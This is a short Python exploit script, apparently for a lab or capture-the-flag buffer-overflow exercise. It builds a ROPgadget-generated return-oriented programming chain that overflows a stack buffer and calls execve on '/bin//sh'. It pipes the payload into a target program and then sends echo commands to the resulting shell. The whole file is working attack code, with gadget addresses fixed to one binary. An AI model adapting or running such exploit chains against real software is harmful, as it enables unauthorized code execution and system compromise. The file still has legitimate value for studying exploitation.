#!/usr/bin/env python3
# execve generated by ROPgadget

from struct import pack
import time
import sys

# Padding goes here
p = b'a' * 0x88

p += pack('<Q', 0x0000000000409ece) # pop rsi ; ret
p += pack('<Q', 0x00000000004c50e0) # @ .data
p += pack('<Q', 0x0000000000447d27) # pop rax ; ret
p += b'/bin//sh'
p += pack('<Q', 0x000000000044a275) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x0000000000409ece) # pop rsi ; ret
p += pack('<Q', 0x00000000004c50e8) # @ .data + 8
p += pack('<Q', 0x000000000043cef0) # xor rax, rax ; ret
p += pack('<Q', 0x000000000044a275) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x0000000000401e5f) # pop rdi ; ret
p += pack('<Q', 0x00000000004c50e0) # @ .data
p += pack('<Q', 0x0000000000409ece) # pop rsi ; ret
p += pack('<Q', 0x00000000004c50e8) # @ .data + 8
p += pack('<Q', 0x000000000040165e) # pop rdx ; ret
p += pack('<Q', 0x00000000004c50e8) # @ .data + 8
p += pack('<Q', 0x000000000043cef0) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000470fd0) # add rax, 1 ; ret
p += pack('<Q', 0x0000000000401c14) # syscall

from_program = sys.stdin.buffer
from_program.read(1)

to_program = sys.stdout.buffer
to_program.write(p + b'\n')
to_program.flush()
sys.stderr.write('sent attack, now waiting...\n')
time.sleep(5)
to_program.write(b'echo This is an example message.\n')
to_program.flush()
time.sleep(5)
to_program.write(b'echo Another example message.\n')
to_program.flush()

